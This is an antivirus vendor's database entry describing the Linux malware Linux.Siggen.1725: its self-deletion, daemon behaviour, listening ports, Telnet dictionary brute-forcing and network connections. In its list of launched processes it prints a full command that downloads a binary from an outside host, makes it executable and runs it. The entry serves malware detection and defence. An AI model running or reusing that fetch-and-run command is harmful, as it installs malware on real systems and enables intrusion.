Linux.Siggen.1725
Added to the Dr.Web virus database:
2019-05-20
Virus description added:
2019-05-20
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
- sh -c wget http://www.1vex.cn/n2; chmod 777 *; ./n2 wget.echo.telnet.mips
- wget http://www.1vex.cn/n2
- chmod 777 n2 run.sh stdout.log
- ./n2 wget.echo.telnet.mips
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
Creates or modifies files:
Network activity:
Awaits incoming connections on ports:
- 0.0.0.0:23
- 0.0.0.0:1997
- 0.0.0.0:80
- 0.0.0.0:81
- 0.0.0.0:8443
- 0.0.0.0:9009
- 0.0.0.0:1943
- 0.0.0.0:1991
- 0.0.0.0:1338
- 0.0.0.0:48101
Establishes connection:
- <LOCAL_DNS_SERVER>
- 8.#.8.8:53
- 62.###.207.229:89
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細